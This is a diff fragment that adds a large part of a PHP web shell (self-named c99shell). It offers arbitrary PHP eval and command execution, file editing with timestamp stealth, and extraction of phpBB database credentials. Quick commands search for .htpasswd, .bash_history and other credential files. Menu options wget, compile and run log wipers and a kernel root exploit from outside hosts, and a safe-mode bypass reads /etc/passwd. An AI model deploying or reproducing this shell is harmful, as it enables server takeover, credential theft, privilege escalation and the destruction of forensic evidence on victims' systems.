+     echo "</tr>";
+    }
+   }
+  }
+  else
+  {
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
+   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
+   $ret = convert_cyr_string($ret,"d","w");
+   $stack = explode("\n",$ret);
+   unset($stack[0],$stack[2]);
+   $stack = array_values($stack);
+   $head = explode("",$stack[0]);
+   $head[1] = explode(" ",$head[1]);
+   $head[1] = $head[1][0];
+   $stack = array_slice($stack,1);
+   unset($head[2]);
+   $head = array_values($head);
+   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";}
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";}
+   if ($k > count($head)) {$k = count($head)-1;}
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+    {
+     echo "<tr>";
+     $line = explode("",$line);
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024; 
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  $head[$k] = "<b>".$head[$k]."</b>".$y;
+  $v = $processes_sort[0];
+  usort($prcs,"tabsort");
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
+  $tab = array();
+  $tab[] = $head;
+  $tab = array_merge($tab,$prcs);
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+  foreach($tab as $i=>$k)
+  {
+   echo "<tr>";
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
+   echo "</tr>";
+  }
+  echo "</table>";
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>Result of execution this PHP-code</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   eval($eval);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($eval_txt)
+   {
+    $rows = count(explode("\r\n",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret."<br>";}
+  }
+  else
+  {
+   if ($eval_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    eval($eval);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $r = @file_get_contents($d.$f);
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+  $arr = array(
+   array("[hex]","info"),
+   array("[html]","html"),
+   array("[txt]","txt"),
+   array("[Code]","code"),
+   array("[Session]","phpsess"),
+   array("[exe]","exe"),
+   array("[SDB]","sdb"),
+   array("[gif]","img"),
+   array("[ini]","ini"),
+   array("[download]","download"),
+   array("[rtf]","notepad"),
+   array("[change]","edit")
+  );
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;[$ext]&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+  foreach($arr as $t)
+  {
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+  }
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+   if (!$win)
+   {
+    echo "<tr><td><b>Owner/Group</b></td><td> ";    
+    $ow = posix_getpwuid(fileowner($d.$f));
+    $gr = posix_getgrgid(filegroup($d.$f));
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+   }
+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
+   $fi = fopen($d.$f,"rb");
+   if ($fi)
+   {
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+    $n = 0;
+    $a0 = "00000000<br>";
+    $a1 = "";
+    $a2 = "";
+    for ($i=0; $i<strlen($str); $i++)
+    {
+     $a1 .= sprintf("%02X",ord($str[$i]))." ";
+     switch (ord($str[$i]))
+     {
+      case 0:  $a2 .= "<font>0</font>"; break;
+      case 32:
+      case 10:
+      case 13: $a2 .= "&nbsp;"; break;
+      default: $a2 .= htmlspecialchars($str[$i]);
+     }
+     $n++;
+     if ($n == $hexdump_rows)
+     {
+      $n = 0;
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+      $a1 .= "<br>";
+      $a2 .= "<br>";
+     }
+    }
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
+   }
+   $encoded = "";
+   if ($base64 == 1)
+   {
+    echo "<b>Base64 Encode</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+   }
+   elseif($base64 == 2)
+   {
+    echo "<b>Base64 Encode + Chunk</b><br>";
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+   }
+   elseif($base64 == 3)
+   {
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+   }
+   elseif($base64 == 4)
+   {
+    $text = file_get_contents($d.$f);
+    $encoded = base64_decode($text);
+    echo "<b>Base64 Decode";
+    if (base64_encode($encoded) != $text) {echo " (failed)";}
+    echo "</b><br>";
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+<P>";
+  }
+  elseif ($ft == "html")
+  {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {c99shexit();}
+  }
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
+  elseif ($ft == "phpsess")
+  {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+   $ext = explode(".",$f);
+   $c = count($ext)-1;
+   $ext = $ext[$c];
+   $ext = strtolower($ext);
+   $rft = "";
+   foreach($exeftypes as $k=>$v)
+   {
+    if (in_array($ext,$v)) {$rft = $k; break;}
+   }
+   $cmd = str_replace("%f%",$f,$rft);
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
+  }
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
+  elseif ($ft == "code")
+  {
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
+   {
+    $arr = explode("\n",$r);
+    if (count($arr == 18))
+    {
+     include($d.$f);
+     echo "<b>phpBB configuration is detected in this file!<br>";
+     if ($dbms == "mysql4") {$dbms = "mysql";}
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";}
+     echo "Parameters for manual connect:<br>";
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+     echo "</b><hr size=\"1\" noshade>";
+    }
+   }
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+   if (!empty($white)) {@ob_clean();}
+   highlight_file($d.$f);
+   if (!empty($white)) {c99shexit();}
+   echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+   @ob_clean();
+   header("Content-type: application/octet-stream");
+   header("Content-length: ".filesize($d.$f));
+   header("Content-disposition: attachment; filename=\"".$f."\";");
+   echo $r;
+   exit;
+  }
+  elseif ($ft == "notepad")
+  {
+   @ob_clean();
+   header("Content-type: text/plain");
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+   echo($r);
+   exit;
+  }
+  elseif ($ft == "img")
+  {
+   $inf = getimagesize($d.$f);
+   if (!$white)
+   {
+    if (empty($imgsize)) {$imgsize = 20;}
+    $width = $inf[0]/100*$imgsize;
+    $height = $inf[1]/100*$imgsize;
+    echo "<center><b>Size:</b>&nbsp;";
+    $sizes = array("100","50","20");
+    foreach ($sizes as $v)
+    {
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+     if ($imgsize != $v ) {echo $v;}
+     else {echo "<u>".$v."</u>";}
+     echo "</a>&nbsp;&nbsp;&nbsp;";
+    }
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
+   }
+   else
+   {
+    @ob_clean();
+    $ext = explode($f,".");
+    $ext = $ext[count($ext)-1];
+    header("Content-type: ".$inf["mime"]);
+    readfile($d.$f);
+    exit;
+   }
+  }
+  elseif ($ft == "edit")
+  {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$edit_text);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $edit_text;
+    }
+   }
+   $rows = count(explode("\r\n",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+}
+else
+{
+ @ob_clean();
+ //For simple size- and speed-optimization.
+ $imgequals = array(
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+  "ext_html"=>array("ext_html","ext_htm"),
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+  "ext_lnk"=>array("ext_lnk","ext_url"),
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+  "ext_doc"=>array("ext_doc","ext_dot"),
+  "ext_js"=>array("ext_js","ext_vbs"),
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+  "ext_wri"=>array("ext_wri","ext_rtf"),
+  "ext_swf"=>array("ext_swf","ext_fla"),
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+ );
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+  if (empty($images[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($images[$img]);
+ }
+ else
+ {
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
+  natsort($images);
+  $k = array_keys($images);
+  echo  "<center>";
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
+  echo "</center>";
+ }
+ exit;
+}
+?>
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top"><center><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><br/><b>Local Command:</b> <input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center"><br/>
+    <b> Quick Commands </b></div>
+    <form action="<?php echo $surl; ?>">
+      <div align="center">
+        <input type=hidden name=act value="cmd">
+        <input type=hidden name="d" value="<?php echo $dispd; ?>">
+         <SELECT NAME="cmd">
+		 <OPTION VALUE="#"> [File Manipulation]
+		 <OPTION VALUE="">                   
+		 <OPTION VALUE="lsattr -va">List file attributes on a Linux second extended file system
+		 <OPTION VALUE="find / -type f -perm -04000 -ls">Find suid files
+           <OPTION VALUE="find . -type f -perm -04000 -ls">Find suid files in current directory
+           <OPTION VALUE="find / -type f -perm -02000 -ls">Find sgid files
+           <OPTION VALUE="find . -type f -perm -02000 -ls">Find sgid files in current directory
+		    <OPTION VALUE="ls -lia">List you current directory's files, folders, & permissions
+			 <OPTION VALUE="find / -type f -name config.inc.php">Find config.inc.php files
+             <OPTION VALUE="find . -type f -name config.inc.php">Find config.inc.php files in current directory
+             <OPTION VALUE="find / -type f -name "config*">Find config* files
+             <OPTION VALUE="find . -type f -name "config*">Find config* files in current directory
+              <OPTION VALUE="find / -type f -perm -2 -ls">Find all writable files
+             <OPTION VALUE="find . -type f -perm -2 -ls">Find all writable files in current directory
+             <OPTION VALUE="find / -perm -2 -ls">Find all writable directories and files
+	    	 <OPTION VALUE="find . -perm -2 -ls">Find all writable directories and files in current directory
+			 <OPTION VALUE="find / -type f -name service.pwd">Find all service.pwd files
+			 <OPTION VALUE="find . -type f -name service.pwd">Find service.pwd files in current directory
+			 <OPTION VALUE="find / -type f -name .htpasswd">Find all .htpasswd files
+			 <OPTION VALUE="find . -type f -name .htpasswd">Find .htpasswd files in current directory
+			 <OPTION VALUE="find / -type f -name .bash_history">Find all .bash_history files
+			 <OPTION VALUE="find . -type f -name .bash_history">Find .bash_history files in current directory
+			 <OPTION VALUE="find / -type f -name .mysql_history">Find all .mysql_history files
+			<OPTION VALUE="find . -type f -name .mysql_history">Find .mysql_history files in current directory
+			 <OPTION VALUE="find / -type f -name .fetchmailrc">Find all .fetchmailrc files
+			<OPTION VALUE="find . -type f -name .fetchmailrc">Find .fetchmailrc files in current directory
+			<OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
+			<OPTION VALUE="">                   
+		<OPTION VALUE="#"> [Directory Malipulation]
+		<OPTION VALUE="">                  
+		<OPTION VALUE="pwd">List your current directory
+		<OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Is /etc/ writable?
+		<OPTION VALUE="find /  -type d -perm -2 -ls">Find all writable directories
+<OPTION VALUE="find . -type d -perm -2 -ls">Find all writable directories in current directory
+<OPTION VALUE="find /  -type d -perm -2 -ls">Find all writable directories
+<OPTION VALUE="find . -type d -perm -2 -ls">Find all writable directories in current directory
+<OPTION VALUE="">                   
+<OPTION VALUE="#"> [Miscellaneous Commands]
+<OPTION VALUE="">                   
+           <OPTION VALUE="tar -cvf NEWTAR!!.tar -c <?php passthru('pwd'); ?>">Tar your current directory. (Only works if the directory is writable)
+  <OPTION VALUE="uname -a">Kernel version
+           <OPTION VALUE="w">Logged in users
+           <OPTION VALUE="lastlog">Last users to connect
+           <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
+           <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">Users without passwords
+            <OPTION VALUE="cat /proc/version /proc/cpuinfo">CpuInfo
+             <OPTION VALUE="netstat -atup | grep IST">Open ports    
+			 <OPTION VALUE="">                                     
+            <OPTION VALUE="#"> [Application Verification]
+			<OPTION VALUE="">                   
+            <OPTION VALUE="which wget curl w3m lynx">Check For Downloaders (WGET, et cetera)
+            <OPTION VALUE="locate gcc">Check For GCC
+			<OPTION VALUE="">                   
+		   <OPTION VALUE="#"> [Log Cleaners]
+		   <OPTION VALUE="">                   
+                    <OPTION VALUE="wget http://packetstormsecurity.org/UNIX/penetration/log-wipers/logcleaner-0.3.c">Wipelogs (Part 1)(Zap3)
+                    <OPTION VALUE="gcc logcleaner-0.3.c -o logcleaner-0.3">Wipelogs (Part 2)(Zap3)
+                    <OPTION VALUE="./logcleaner-0.3 <? echo $_SERVER["REMOTE_ADDR"]; ?>">Wipelogs (Part 3)(Zap3)
+                    <OPTION VALUE="Gone!<? if($_REQUEST['cmd']=="Gone!") { if (file_exists("logcleaner-0.3.c")) { unlink("logcleaner-0.3.c"); } if (file_exists("logcleaner-0.3")) { unlink("logcleaner-0.3"); } } ?>">Remove All Zap3 Traces
+                   <OPTION VALUE="">  
+                    <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/vanish.c">Wipelogs (Part 1)(Vanish)
+                    <OPTION VALUE="gcc vanish.c -o vanish">Wipelogs (Part 2)(Vanish)
+                     <OPTION VALUE="./vanish <? echo exec('whoami'); ?> <? echo $_SERVER["REMOTE_ADDR"]; ?> <? echo gethostbyname($_SERVER["HTTP_HOST"]); ?>">Wipelogs (Part 3)(Vanish)
+                    <OPTION VALUE="Gone!!<? if($_REQUEST['cmd']=="Gone!!") { if (file_exists("vanish.c")) { unlink("vanish.c"); } if (file_exists("vanish")) { unlink("vanish"); } } ?>">Remove All Vanish Traces
+                   <OPTION VALUE=""> 
+                   <OPTION VALUE="#"> [Root Exploits]
+		   <OPTION VALUE=""> 
+                    <OPTION VALUE="wget http://www.synsta.templatez.org/1.txt">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 1)
+                   <OPTION VALUE="mv 1.txt exploit.c">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 2)
+                   <OPTION VALUE="gcc exploit.c -o exploit">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 3)
+                   <OPTION VALUE="./exploit">Linux Kernel 2.6.13 - 2.6.17.4 Local Root Exploit (Part 4)
+                   <OPTION VALUE="Gone!!!<? if($_REQUEST['cmd']=="Gone!!!") { if (file_exists("exploit.c")) { unlink("exploit.c"); } if (file_exists("1.txt")) { unlink("1.txt"); } if (file_exists("exploit")) { unlink("exploit"); } } ?>">Remove All Exploit Traces
+                    </SELECT>
+        
+        <input type=hidden name="cmd_txt" value="1">
+        &nbsp;
+        <input type=submit name=submit value="Execute"></div>
+    </form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+  <center><br/><b> Kernel Information </b>
+<form action=http://google.com/search name=f><input type=hidden name=client value="firefox-a"><input type=hidden name=rls value="org.mozilla:en-US:official_s"><input type=hidden name=hl value=en><input id=sf maxLength=256 name=q value="<?php echo wordwrap(php_uname()); ?>" size=80>
+&nbsp;
+<input type=submit value="Search" name=btnG></form>
+</center>
+    </td>
+</tr></TABLE>
+<br>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center"><strong>PHP Safe-Mode Bypass (Read Files)    </strong></div>
+    <br>
+    <form action="<?php echo $surl; ?>" method="post">
+      <div align="center">
+      File: <input type="text" name="file"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br>
+      <?php
+      function rsg_read()
+	{	
+	$test="";
+	$temp=tempnam($test, "cx");
+	$file=$_REQUEST['file'];	
+	$get=htmlspecialchars($file);
+	echo "</br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
+	if(copy("compress.zlib://".$file, $temp)){
+	$fichier = fopen($temp, "r");
+	$action = fread($fichier, filesize($temp));
+	fclose($fichier);
+	$source=htmlspecialchars($action);
+
+
+	echo "<div class=\"shell\"></br><b>Reading $get:</b><br><br><textarea rows=10 cols=50>$source</textarea><br>";
+	unlink($temp);
+	} else {
+	echo("</br><FONT COLOR=\"RED\"><CENTER>Sorry... File
+	<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
+	access.</CENTER></FONT>");
+			}
+	echo "</div>";
+	}
+	
+	if(isset($_REQUEST['file']))
+{
+rsg_read();
+}
+	
+	?>
+	
+	<?
+	
+	function rsg_glob()
+{
+$chemin=$_REQUEST['directory'];
+$files = glob("$chemin*");
+echo "</br>Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
+foreach ($files as $filename) {
+	echo "<pre>";
+   echo "$filename\n";
+   echo "</pre>";
+}
+}
+
+if(isset($_REQUEST['directory']))
+{
+rsg_glob();
+}
+
+?>
+
+          <br>
+      </div>
+    </form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>
+     <strong>PHP Safe-Mode Bypass (List Directories)</strong>:     
+     <form action="<?php echo $surl; ?>" method="post">
+      <div align="center"><br>
+      Dir: <input type="text" name="directory"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br>
+
+    </form></center>
+    </td>
+</tr></TABLE>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top"><center>
+   <b>Search</b>
+   <form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td>
+ <td width="50%" height="1" valign="top"><center>
+   <b>Upload</b>
+   <form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td>
+</tr>
+</table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>
+  <b><strong>Create Directory
+  </strong>
+  <p><form action="<?php echo $PHP_SELF; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center>
+    <strong>Create File </strong>
+    <form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
+
